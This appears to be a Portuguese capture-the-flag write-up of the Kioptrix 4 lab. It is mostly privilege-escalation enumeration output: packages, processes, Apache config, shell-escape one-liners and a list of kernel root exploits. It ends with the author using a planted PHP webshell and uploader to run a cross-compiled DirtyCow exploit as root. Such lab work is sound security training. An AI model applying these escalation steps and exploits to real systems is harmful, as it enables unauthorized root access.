libxml2 2.6.31.dfsg-2ubuntu1.3 XML library
linux-image-2.6.24-24-server 2.6.24-24.56 kernel image for version 2.6.24 on x86/x86_64
linux-image-server 2.6.24.24.26 kernel image on Server Equipment.
linux-server 2.6.24.24.26 Linux kernel on Server Equipment.
linux-ubuntu-modules-2.6.24-24-serve 2.6.24-24.39 supplied Linux modules for version 2.6.24 on x86/x86_64
locales 2.7.9-4 files for locale support
login 1:4.0.18.2-1ubuntu2.2 login tools
logrotate 3.7.1-3ubuntu0.8.04 rotation utility
lsb-base 4.0-0ubuntu0.8.04.1 Standard Base 4.0 init script functionality
lsb-release 4.0-0ubuntu0.8.04.1 Standard Base version reporting utility
lshw 02.12.01-2ubuntu1.1 about hardware configuration
lsof 4.78.dfsg.1-3 open files
ltrace 0.5-3ubuntu1 runtime library calls in dynamically linked programs
lzma 4.43-12ubuntu1 method of 7z format in 7-Zip program
makedev 2.3.1-84ubuntu1 device files in /dev
man-db 2.5.1-3 manual pager
manpages 2.77-1 pages about using a GNU/Linux system
mawk 1.3.3-11ubuntu2 pattern scanning and text processing language
memtest86+ 1.70-3ubuntu1 real-mode memory tester
mii-diag 2.11-2 little tool to manipulate network cards
mime-support 3.39-1ubuntu1 files 'mime.types' & 'mailcap', and support programs
mktemp 1.5-5ubuntu2 unique filenames for temporary files
mlocate 0.18-2ubuntu1 find files on the filesystem based on their name
module-init-tools 3.3-pre11-4ubuntu5.8.04.1 for managing Linux kernel modules
mount 2.13.1-5ubuntu3 for mounting and manipulating filesystems
mtr-tiny 0.72-2ubuntu1 screen ncurses traceroute tool
mysql-client-5.0 5.0.51a-3ubuntu5.4 database client binaries
mysql-common 5.0.51a-3ubuntu5.4 database common files
mysql-server 5.0.51a-3ubuntu5.4 database server (meta package depending on the latest version)
mysql-server-5.0 5.0.51a-3ubuntu5.4 database server binaries
nano 2.0.7-1ubuntu1 Pico clone with some new features
ncurses-base 5.6+20071124-1ubuntu2 of common terminal types
ncurses-bin 5.6+20071124-1ubuntu2 programs and man pages
net-tools 1.60-19ubuntu1 NET-3 networking toolkit
netbase 4.30ubuntu1 TCP/IP networking system
netcat-traditional 1.10-36 swiss army knife
ntfs-3g 1:1.2216-1ubuntu3 NTFS driver for FUSE
ntpdate 1:4.2.4p4+dfsg-3ubuntu2.2 for setting system time from NTP servers
openssh-blacklist 0.1-1ubuntu0.8.04.1 of blacklisted OpenSSH RSA and DSA keys
openssh-client 1:4.7p1-8ubuntu1.2 shell client, an rlogin/rsh/rcp replacement
openssh-server 1:4.7p1-8ubuntu1.2 shell server, an rshd replacement
parted 1.7.1-5.1ubuntu9.2 GNU Parted disk partition resizing program
passwd 1:4.0.18.2-1ubuntu2.2 and administer password and group data
pciutils 1:2.2.4-1.1ubuntu6 PCI Utilities
pcmciautils 014-4ubuntu1 utilities for Linux 2.6
perl 5.8.8-12ubuntu0.4 Wall's Practical Extraction and Report Language
perl-base 5.8.8-12ubuntu0.4 Pathologically Eclectic Rubbish Lister
perl-modules 5.8.8-12ubuntu0.4 Perl modules
php5-common 5.2.4-2ubuntu5.6 files for packages built from the php5 source
php5-mysql 5.2.4-2ubuntu5.6 module for php5
popularity-contest 1.43ubuntu1 for your favourite packages automatically
ppp 2.4.4rel-9ubuntu2 Protocol (PPP) daemon
pppconfig 2.3.17ubuntu1 text menu based utility for configuring ppp
pppoeconf 1.17ubuntu1 PPPoE/ADSL connections
procps 1:3.2.7-5ubuntu3 file system utilities
psmisc 22.6-1 that use the proc filesystem
python 2.5.2-0ubuntu1 interactive high-level object-oriented language (default version)
python-apt 0.7.4ubuntu7.5 interface to libapt-pkg
python-central 0.6.7ubuntu0.1 and build utility for Python packages
python-gdbm 2.5.2-0ubuntu2 dbm database support for Python
python-gnupginterface 0.3.2-9ubuntu1 interface to GnuPG (GPG)
python-minimal 2.5.2-0ubuntu1 minimal subset of the Python language (default version)
python-support 0.7.5ubuntu1 rebuilding support for python modules
python2.5 2.5.2-2ubuntu4.1 interactive high-level object-oriented language (version 2.5)
python2.5-minimal 2.5.2-2ubuntu4.1 minimal subset of the Python language (version 2.5)
readline-common 5.2-3build1 readline and history libraries, common files
reiserfsprogs 1:3.6.19-6 tools for ReiserFS filesystems
rsync 2.6.9-6ubuntu2 remote file copy program (like rcp)
samba 3.0.28a-1ubuntu4.8 LanManager-like file and printer server for Unix
samba-common 3.0.28a-1ubuntu4.8 common files used by both the server and the client
samba-doc 3.0.28a-1ubuntu4.8 documentation
sed 4.1.5-5 GNU sed stream editor
smbclient 3.0.28a-1ubuntu4.8 LanManager-like simple client for Unix
smbfs 3.0.28a-1ubuntu4.8 and umount commands for the smbfs (for kernels >= than 2.2.x)
startup-tasks 0.3.9-2 of essential tasks to run on startup
strace 4.5.15-1.1ubuntu1 system call tracer
sudo 1.6.9p10-1ubuntu3.4 limited super user privileges to specific users
sysklogd 1.5-1ubuntu1 Logging Daemon
system-services 0.3.9-2 of essential system services
sysv-rc 2.86.ds1-14.1ubuntu45.1 runlevel change mechanism
sysvutils 2.86.ds1-14.1ubuntu45.1 utilities
tar 1.19-3 version of the tar archiving utility
tasksel 2.70ubuntu6 for selecting tasks for installation on Debian systems
tasksel-data 2.70ubuntu6 tasks used for installation of Debian systems
tcpd 7.6.dbs-14 Venema's TCP wrapper utilities
tcpdump 3.9.8-2 powerful tool for network monitoring and data acquisition
telnet 0.17-35ubuntu1 telnet client
time 1.7-21build1 GNU time program for measuring cpu resource usage
tzdata 2009j-0ubuntu0.8.04 zone and daylight-saving time data
ubuntu-keyring 2008.03.04 keys of the Ubuntu archive
ubuntu-minimal 1.102 core of Ubuntu
ubuntu-standard 1.102 Ubuntu standard system
ucf 3.005 Configuration File: preserve user changes to config files.
udev 117-8ubuntu0.2 device node and kernel event manager
ufw 0.16.2.4 for managing a netfilter firewall
update-inetd 4.27-0.6 updater
update-manager-core 1:0.87.31 release upgrades
upstart 0.3.9-2 init daemon
upstart-compat-sysv 0.3.9-2 for System-V-like init
upstart-logd 0.3.9-2 logging daemon
usbutils 0.73-5ubuntu2 USB utilities
util-linux 2.13.1-5ubuntu3 system utilities
util-linux-locales 2.13.1-5ubuntu3 files for util-linux
uuid-runtime 1.40.8-2ubuntu2 unique id library
vim-common 1:7.1-138+1ubuntu3.1 IMproved - Common files
vim-tiny 1:7.1-138+1ubuntu3.1 IMproved - enhanced vi editor - compact version
w3m 0.5.1-5.1ubuntu1 browsable pager with excellent tables/frames support
wget 1.10.2-3ubuntu1 files from the web
whiptail 0.52.2-11.2ubuntu1 user-friendly dialog boxes from shell scripts
winbind 3.0.28a-1ubuntu4.8 to resolve user and group information from Windows NT servers
wireless-tools 29-1ubuntu2 for manipulating Linux Wireless Extensions
wpasupplicant 0.6.0+0.5.8-0ubuntu2 support for WPA and WPA2 (IEEE 802.11i)
xkb-data 1.1~cvs.20080104.1-1ubuntu8 Keyboard Extension (XKB) configuration data
zlib1g 1:1.2.3.3.dfsg-7ubuntu1 library - runtime
[+] Current processes
USER PID START TIME COMMAND
root 1 12:25 0:01 /sbin/init
root 2 12:25 0:00 [kthreadd]
root 3 12:25 0:00 [migration/0]
root 4 12:25 0:00 [ksoftirqd/0]
root 5 12:25 0:00 [watchdog/0]
root 6 12:25 0:00 [events/0]
root 7 12:25 0:00 [khelper]
root 41 12:25 0:00 [kblockd/0]
root 44 12:25 0:00 [kacpid]
root 45 12:25 0:00 [kacpi_notify]
root 174 12:25 0:00 [kseriod]
root 213 12:25 0:00 [pdflush]
root 214 12:25 0:00 [pdflush]
root 215 12:25 0:00 [kswapd0]
root 257 12:25 0:00 [aio/0]
root 1481 12:25 0:00 [ata/0]
root 1484 12:25 0:00 [ata_aux]
root 1493 12:25 0:00 [scsi_eh_0]
root 1497 12:25 0:00 [scsi_eh_1]
root 1510 12:25 0:00 [ksuspend_usbd]
root 1515 12:25 0:00 [khubd]
root 2363 12:25 0:00 [scsi_eh_2]
root 2461 12:25 0:00 [scsi_eh_3]
root 2462 12:25 0:00 [scsi_eh_4]
root 2463 12:25 0:00 [scsi_eh_5]
root 2464 12:25 0:00 [scsi_eh_6]
root 2465 12:25 0:00 [scsi_eh_7]
root 2466 12:25 0:00 [scsi_eh_8]
root 2467 12:25 0:00 [scsi_eh_9]
root 2468 12:25 0:00 [scsi_eh_10]
root 2469 12:25 0:00 [scsi_eh_11]
root 2470 12:25 0:00 [scsi_eh_12]
root 2471 12:25 0:00 [scsi_eh_13]
root 2472 12:25 0:00 [scsi_eh_14]
root 2473 12:25 0:00 [scsi_eh_15]
root 2474 12:25 0:00 [scsi_eh_16]
root 2475 12:25 0:00 [scsi_eh_17]
root 2476 12:25 0:00 [scsi_eh_18]
root 2477 12:25 0:00 [scsi_eh_19]
root 2478 12:25 0:00 [scsi_eh_20]
root 2479 12:25 0:00 [scsi_eh_21]
root 2480 12:25 0:00 [scsi_eh_22]
root 2481 12:25 0:00 [scsi_eh_23]
root 2482 12:25 0:00 [scsi_eh_24]
root 2483 12:25 0:00 [scsi_eh_25]
root 2484 12:25 0:00 [scsi_eh_26]
root 2485 12:25 0:00 [scsi_eh_27]
root 2486 12:25 0:00 [scsi_eh_28]
root 2487 12:25 0:00 [scsi_eh_29]
root 2488 12:25 0:00 [scsi_eh_30]
root 2489 12:25 0:00 [scsi_eh_31]
root 2490 12:25 0:00 [scsi_eh_32]
root 2682 12:25 0:00 [kjournald]
root 2853 12:25 0:00 /sbin/udevd
root 3155 12:25 0:00 [kgameportd]
root 3304 12:25 0:00 [kpsmoused]
root 4606 12:25 0:00 /sbin/getty
root 4608 12:25 0:00 /sbin/getty
root 4614 12:25 0:00 /sbin/getty
root 4618 12:25 0:00 /sbin/getty
root 4622 12:25 0:00 /sbin/getty
syslog 4655 12:25 0:00 /sbin/syslogd
root 4674 12:25 0:00 /bin/dd
klog 4676 12:25 0:00 /sbin/klogd
root 4695 12:25 0:00 /usr/sbin/sshd
root 4751 12:25 0:00 /bin/sh
root 4793 12:25 0:04 /usr/sbin/mysqld
root 4795 12:25 0:00 logger
root 4868 12:25 0:00 /usr/sbin/nmbd
root 4870 12:25 0:00 /usr/sbin/smbd
root 4878 12:25 0:00 /usr/sbin/smbd
root 4885 12:25 0:00 /usr/sbin/winbindd
root 4887 12:25 0:00 /usr/sbin/winbindd
daemon 4906 12:25 0:00 /usr/sbin/atd
root 4917 12:25 0:00 /usr/sbin/cron
root 4939 12:25 0:00 /usr/sbin/apache2
dhcp 4999 12:25 0:00 dhclient
root 5006 12:25 0:00 /sbin/getty
www-data 5066 12:33 0:01 /usr/sbin/apache2
root 5150 12:33 0:00 /usr/sbin/winbindd
root 5151 12:33 0:00 /usr/sbin/winbindd
www-data 5221 12:51 0:00 /usr/sbin/apache2
www-data 5222 12:51 0:00 /usr/sbin/apache2
www-data 5223 12:51 0:00 /usr/sbin/apache2
www-data 5225 12:51 0:00 /usr/sbin/apache2
www-data 5226 12:51 0:00 /usr/sbin/apache2
www-data 5233 12:53 0:00 /usr/sbin/apache2
www-data 5235 12:53 0:00 /usr/sbin/apache2
root 5530 13:29 0:00 sshd:
john 5532 13:29 0:01 sshd:
john 5533 13:29 0:00 python
john 5540 13:29 0:00 [sh]
john 5547 13:30 0:00 sh
john 5548 13:30 0:00 /bin/bash
john 5627 13:37 0:00 /bin/bash
john 12984 14:56 0:00 /usr/bin/python
john 13159 14:56 0:00 /bin/sh
john 13160 14:56 0:00 ps
[+] Apache Version and Modules
Server version: Apache/2.2.8 (Ubuntu)
Server built: Jun 18 2009 08:47:00
[+] Apache Config File
#
# Based upon the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do. They're here only as hints or reminders. If you are unsure
# consult the online docs. You have been warned.
#
# The configuration directives are grouped into three basic sections:
# 1. Directives that control the operation of the Apache server process as a
# whole (the 'global environment').
# 2. Directives that define the parameters of the 'main' or 'default' server,
# which responds to requests that aren't handled by a virtual host.
# These directives also provide default values for the settings
# of all virtual hosts.
# 3. Settings for virtual hosts, which allow Web requests to be sent to
# different IP addresses or hostnames and have them handled by the
# same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path. If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
# with ServerRoot set to "" will be interpreted by the
# server as "//var/log/apache2/foo.log".
#
### Section 1: Global Environment
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests it can handle or where it
# can find its configuration files.
#
#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE! If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the LockFile documentation (available
# at <URL:http://httpd.apache.org/docs-2.1/mod/mpm_common.html#lockfile>);
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
ServerRoot "/etc/apache2"
#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
#<IfModule !mpm_winnt.c>
#<IfModule !mpm_netware.c>
LockFile /var/lock/apache2/accept.lock
#</IfModule>
#</IfModule>
#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}
#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300
#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On
#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100
#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 15
##
## Server-Pool Size Regulation (MPM specific)
##
# prefork MPM
# StartServers: number of server processes to start
# MinSpareServers: minimum number of server processes which are kept spare
# MaxSpareServers: maximum number of server processes which are kept spare
# MaxClients: maximum number of server processes allowed to start
# MaxRequestsPerChild: maximum number of requests a server process serves
<IfModule mpm_prefork_module>
StartServers 5
MinSpareServers 5
MaxSpareServers 10
MaxClients 150
MaxRequestsPerChild 0
</IfModule>
# worker MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves
<IfModule mpm_worker_module>
StartServers 2
MaxClients 150
MinSpareThreads 25
MaxSpareThreads 75
ThreadsPerChild 25
MaxRequestsPerChild 0
</IfModule>
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
#
# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives. See also the AllowOverride
# directive.
#
AccessFileName .htaccess
#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#
<Files ~ "^\.ht">
Order allow,deny
Deny from all
</Files>
#
# DefaultType is the default MIME type the server will use for a document
# if it cannot otherwise determine one, such as from filename extensions.
# If your server contains mostly text or HTML documents, "text/plain" is
# a good value. If most of your content is binary, such as applications
# or images, you may want to use "application/octet-stream" instead to
# keep browsers from trying to display binary files as though they are
# text.
#
DefaultType text/plain
#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a <VirtualHost>
# container, error messages relating to that virtual host will be
# logged here. If you *do* define an error logfile for a <VirtualHost>
# container, that host's errors will be logged there and not here.
#
ErrorLog /var/log/apache2/error.log
#
# LogLevel: Control the number of messages logged to the error_log.
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
#
LogLevel warn
# Include module configuration:
Include /etc/apache2/mods-enabled/*.load
Include /etc/apache2/mods-enabled/*.conf
# Include all the user configurations:
Include /etc/apache2/httpd.conf
# Include ports listing
Include /etc/apache2/ports.conf
#
# The following directives define some format nicknames for use with
# a CustomLog directive (see below).
# If you are behind a reverse proxy, you might want to change %h into %{X-Forwarded-For}i
#
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
#
# ServerTokens
# This directive configures what you return as the Server HTTP response
# Header. The default is 'Full' which sends information about the OS-Type
# and compiled in modules.
# Set to one of: Full | OS | Minor | Minimal | Major | Prod
# where Full conveys the most information, and Prod the least.
#
ServerTokens Full
#
# Optionally add a line containing the server version and virtual host
# name to server-generated pages (internal error documents, FTP directory
# listings, mod_status and mod_info output etc., but not CGI generated
# documents or custom error documents).
# Set to "EMail" to also include a mailto: link to the ServerAdmin.
# Set to one of: On | Off | EMail
#
ServerSignature On
#
# Customizable error responses come in three flavors:
# 1) plain text 2) local redirects 3) external redirects
#
# Some examples:
#ErrorDocument 500 "The server made a boo boo."
#ErrorDocument 404 /missing.html
#ErrorDocument 404 "/cgi-bin/missing_handler.pl"
#ErrorDocument 402 http://www.example.com/subscription_info.html
#
#
# Putting this all together, we can internationalize error responses.
#
# We use Alias to redirect any /error/HTTP_<error>.html.var response to
# our collection of by-error message multi-language collections. We use
# includes to substitute the appropriate text.
#
# You can modify the messages' appearance without changing any of the
# default HTTP_<error>.html.var files by adding the line:
#
# Alias /error/include/ "/your/include/path/"
#
# which allows you to create your own set of files by starting with the
# /usr/share/apache2/error/include/ files and copying them to /your/include/path/,
# even on a per-VirtualHost basis. The default include files will display
# your Apache version number and your ServerAdmin email address regardless
# of the setting of ServerSignature.
#
# The internationalized error documents require mod_alias, mod_include
# and mod_negotiation. To activate them, uncomment the following 30 lines.
# Alias /error/ "/usr/share/apache2/error/"
#
# <Directory "/usr/share/apache2/error">
# AllowOverride None
# Options IncludesNoExec
# AddOutputFilter Includes html
# AddHandler type-map var
# Order allow,deny
# Allow from all
# LanguagePriority en cs de es fr it nl sv pt-br ro
# ForceLanguagePriority Prefer Fallback
# </Directory>
#
# ErrorDocument 400 /error/HTTP_BAD_REQUEST.html.var
# ErrorDocument 401 /error/HTTP_UNAUTHORIZED.html.var
# ErrorDocument 403 /error/HTTP_FORBIDDEN.html.var
# ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var
# ErrorDocument 405 /error/HTTP_METHOD_NOT_ALLOWED.html.var
# ErrorDocument 408 /error/HTTP_REQUEST_TIME_OUT.html.var
# ErrorDocument 410 /error/HTTP_GONE.html.var
# ErrorDocument 411 /error/HTTP_LENGTH_REQUIRED.html.var
# ErrorDocument 412 /error/HTTP_PRECONDITION_FAILED.html.var
# ErrorDocument 413 /error/HTTP_REQUEST_ENTITY_TOO_LARGE.html.var
# ErrorDocument 414 /error/HTTP_REQUEST_URI_TOO_LARGE.html.var
# ErrorDocument 415 /error/HTTP_UNSUPPORTED_MEDIA_TYPE.html.var
# ErrorDocument 500 /error/HTTP_INTERNAL_SERVER_ERROR.html.var
# ErrorDocument 501 /error/HTTP_NOT_IMPLEMENTED.html.var
# ErrorDocument 502 /error/HTTP_BAD_GATEWAY.html.var
# ErrorDocument 503 /error/HTTP_SERVICE_UNAVAILABLE.html.var
# ErrorDocument 506 /error/HTTP_VARIANT_ALSO_VARIES.html.var
# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.
# Include generic snippets of statements
Include /etc/apache2/conf.d/
# Include the virtual host configurations:
Include /etc/apache2/sites-enabled/
[+] Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
Sudo version 1.6.9p10
[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
root 2482 12:25 0:00 [scsi_eh_24]
root 2682 12:25 0:00 [kjournald]
root 4795 12:25 0:00 logger
root 2468 12:25 0:00 [scsi_eh_10]
root 44 12:25 0:00 [kacpid]
root 4793 12:25 0:04 /usr/sbin/mysqld
root 4885 12:25 0:00 /usr/sbin/winbindd
root 41 12:25 0:00 [kblockd/0]
root 2475 12:25 0:00 [scsi_eh_17]
root 2465 12:25 0:00 [scsi_eh_7]
root 2490 12:25 0:00 [scsi_eh_32]
root 257 12:25 0:00 [aio/0]
root 3304 12:25 0:00 [kpsmoused]
root 2476 12:25 0:00 [scsi_eh_18]
root 4606 12:25 0:00 /sbin/getty
root 4618 12:25 0:00 /sbin/getty
root 1484 12:25 0:00 [ata_aux]
root 1481 12:25 0:00 [ata/0]
root 215 12:25 0:00 [kswapd0]
root 2474 12:25 0:00 [scsi_eh_16]
root 5 12:25 0:00 [watchdog/0]
root 5530 13:29 0:00 sshd:
root 2464 12:25 0:00 [scsi_eh_6]
root 5150 12:33 0:00 /usr/sbin/winbindd
root 45 12:25 0:00 [kacpi_notify]
root 4868 12:25 0:00 /usr/sbin/nmbd
root 1497 12:25 0:00 [scsi_eh_1]
root 5151 12:33 0:00 /usr/sbin/winbindd
root 2461 12:25 0:00 [scsi_eh_3]
root 2466 12:25 0:00 [scsi_eh_8]
root 4878 12:25 0:00 /usr/sbin/smbd
root 5006 12:25 0:00 /sbin/getty
root 1515 12:25 0:00 [khubd]
root 2485 12:25 0:00 [scsi_eh_27]
root 4870 12:25 0:00 /usr/sbin/smbd
root 2488 12:25 0:00 [scsi_eh_30]
root 174 12:25 0:00 [kseriod]
root 2489 12:25 0:00 [scsi_eh_31]
root 1510 12:25 0:00 [ksuspend_usbd]
root 2484 12:25 0:00 [scsi_eh_26]
root 2480 12:25 0:00 [scsi_eh_22]
root 1 12:25 0:01 /sbin/init
Possible Related Packages:
busybox-initramfs 1:1.1.3-5ubuntu12 shell setup for initramfs
initramfs-tools 0.85eubuntu39.3 for generating an initramfs
initscripts 2.86.ds1-14.1ubuntu45.1 for initializing and shutting down the system
libklibc 1.5.7-4ubuntu4 libc subset for use with initramfs
lsb-base 4.0-0ubuntu0.8.04.1 Standard Base 4.0 init script functionality
module-init-tools 3.3-pre11-4ubuntu5.8.04.1 for managing Linux kernel modules
upstart 0.3.9-2 init daemon
upstart-compat-sysv 0.3.9-2 for System-V-like init
root 4614 12:25 0:00 /sbin/getty
root 3 12:25 0:00 [migration/0]
root 2472 12:25 0:00 [scsi_eh_14]
root 2486 12:25 0:00 [scsi_eh_28]
root 4 12:25 0:00 [ksoftirqd/0]
root 2470 12:25 0:00 [scsi_eh_12]
root 7 12:25 0:00 [khelper]
root 2469 12:25 0:00 [scsi_eh_11]
root 2471 12:25 0:00 [scsi_eh_13]
root 2483 12:25 0:00 [scsi_eh_25]
root 2479 12:25 0:00 [scsi_eh_21]
root 4608 12:25 0:00 /sbin/getty
root 2477 12:25 0:00 [scsi_eh_19]
root 214 12:25 0:00 [pdflush]
root 6 12:25 0:00 [events/0]
root 2363 12:25 0:00 [scsi_eh_2]
root 4887 12:25 0:00 /usr/sbin/winbindd
root 4622 12:25 0:00 /sbin/getty
root 2467 12:25 0:00 [scsi_eh_9]
root 4695 12:25 0:00 /usr/sbin/sshd
root 2 12:25 0:00 [kthreadd]
root 3155 12:25 0:00 [kgameportd]
root 2853 12:25 0:00 /sbin/udevd
root 4751 12:25 0:00 /bin/sh
root 2481 12:25 0:00 [scsi_eh_23]
root 4939 12:25 0:00 /usr/sbin/apache2
Possible Related Packages:
apache2 2.2.8-1ubuntu0.9 generation, scalable, extendable web server
apache2-mpm-prefork 2.2.8-1ubuntu0.9 model for Apache HTTPD
apache2-utils 2.2.8-1ubuntu0.9 programs for webservers
apache2.2-common 2.2.8-1ubuntu0.9 generation, scalable, extendable web server
libapache2-mod-php5 5.2.4-2ubuntu5.6 HTML-embedded scripting language (apache 2 module)
root 2478 12:25 0:00 [scsi_eh_20]
root 4674 12:25 0:00 /bin/dd
root 2463 12:25 0:00 [scsi_eh_5]
root 2487 12:25 0:00 [scsi_eh_29]
root 2462 12:25 0:00 [scsi_eh_4]
root 4917 12:25 0:00 /usr/sbin/cron
Possible Related Packages:
cron 3.0pl1-100ubuntu2.1 of regular background processing
root 2473 12:25 0:00 [scsi_eh_15]
root 213 12:25 0:00 [pdflush]
root 1493 12:25 0:00 [scsi_eh_0]
[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...
[+] Installed Tools
/usr/bin/awk
/usr/bin/perl
/usr/bin/python
/usr/bin/vi
/usr/bin/vim
/usr/bin/find
/bin/netcat
/usr/bin/wget
/usr/bin/ftp
[+] Related Shell Escape Sequences...
vi--> :!bash
vi--> :set shell=/bin/bash:shell
vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
perl--> perl -e 'exec "/bin/bash";'
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
- 2.6 UDEV < 141 Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8572 || Language=c
- 2.6 UDEV Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8478 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- < 2.6.29 exit_notify() Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8369 || Language=c
- 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation || http://www.exploit-db.com/exploits/9844 || Language=python
- < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit || http://www.exploit-db.com/exploits/14814 || Language=c
- 2.x sock_sendpage() Local Root Exploit 2 || http://www.exploit-db.com/exploits/9436 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
- 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver) || http://www.exploit-db.com/exploits/9479 || Language=c
- 2.6 UDEV < 141 Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8572 || Language=c
- 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit || http://www.exploit-db.com/exploits/5092 || Language=c
- Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit || http://www.exploit-db.com/exploits/9083 || Language=c
- 2.4/2.6 sock_sendpage() Local Root Exploit [2] || http://www.exploit-db.com/exploits/9598 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- Linux RDS Protocol Local Privilege Escalation || http://www.exploit-db.com/exploits/15285 || Language=c
- 2.6.x ptrace_attach Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8673 || Language=c
- 2.x sock_sendpage() Local Ring0 Root Exploit || http://www.exploit-db.com/exploits/9435 || Language=c
- Test Kernel Local Root Exploit 0day || http://www.exploit-db.com/exploits/9191 || Language=c
- 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update) || http://www.exploit-db.com/exploits/926 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- 2.4/2.6 sock_sendpage() Local Root Exploit (ppc) || http://www.exploit-db.com/exploits/9545 || Language=c
- 2.6 UDEV Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8478 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- < 2.6.36.2 Econet Privilege Escalation Exploit || http://www.exploit-db.com/exploits/17787 || Language=c
- Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
- < 2.6.37-rc2 ACPI custom_method Privilege Escalation || http://www.exploit-db.com/exploits/15774 || Language=c
- 'pipe.c' Local Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/10018 || Language=sh
- 2.4/2.6 sock_sendpage() Local Root Exploit [3] || http://www.exploit-db.com/exploits/9641 || Language=c
- <= 2.6.37 Local Privilege Escalation || http://www.exploit-db.com/exploits/15704 || Language=c
- 2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/895 || Language=c
Finished
=================================================================================================
Depois de muito workaround eu encontrei um backdoor no alvo comprometido onde possui um webshell e uma ferramenta de upload de arquivos, o que eu não me liguei quando conectei no diretório raiz da aplicação web e paguei algumas horas por isso.
Localizado backdoor:
http://172.16.0.100/tmpbymrg.php?cmd=id -> Shell
http://172.16.0.100/tmpurgaq.php -> Upload
Então a situação é a seguinte, não existe gcc no sistema alvo, não tem como eu transferir arquivos diretamente, para contornar isso, foi necessário fazer um cross-compile do exploit na máquina local para ser então enviado ao alvo via a funcionalidade de upload de arquivos do php plantada como backdoor e executado.
Local: apt-get install gcc-multilib
Local: gcc cowroot.c -o cowroot -pthread -m32 -march=i686
Com o exploit compilado e no sistema alvo com a arquitetura do sistema alvo, é possível executar o mesmo conseguir escalar privilégios para root(0).
john@Kioptrix4:/tmp$ ./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 29104
Racing, this may take a while..
thread stopped
